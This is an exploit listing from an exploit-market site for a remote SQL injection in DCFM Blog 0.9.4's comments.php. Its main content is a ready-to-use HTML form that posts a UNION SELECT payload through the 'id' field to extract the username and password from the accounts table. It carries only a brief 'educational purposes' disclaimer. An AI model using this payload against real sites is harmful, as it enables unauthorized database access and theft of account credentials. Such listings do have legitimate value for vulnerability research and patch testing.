[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

DCFM Blog 0.9.4 (comments) Remote SQL Injection Vulnerability

Author
Unohope
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-3145
Category
web applications
Date add
09-06-2008
Platform
unsorted
=============================================================
DCFM Blog 0.9.4 (comments) Remote SQL Injection Vulnerability
=============================================================



Title =======:: DCFM Blog 0.9.4 (comments) Remote SQL Injection Vulnerability

ScriptName ==:: DCFM Blog

Download ====:: http://nchc.dl.sourceforge.net/sourceforge/dcfm-blog/blog_files_0-9-4.zip


______________________
[SQL Injection]

- {comments.php} -

<form action="http://localhost/dcfmblog/comments.php" method="post">
  <input type="text" name="id" size=50 value="-99' union select 0,username,password from accounts where id=1/*">
  <input type="submit" value=" send ">
</form>

______
[NOTE]

!! This is just for educational purposes, DO NOT use for illegal. !!



#  0day.today [2024-11-16]  #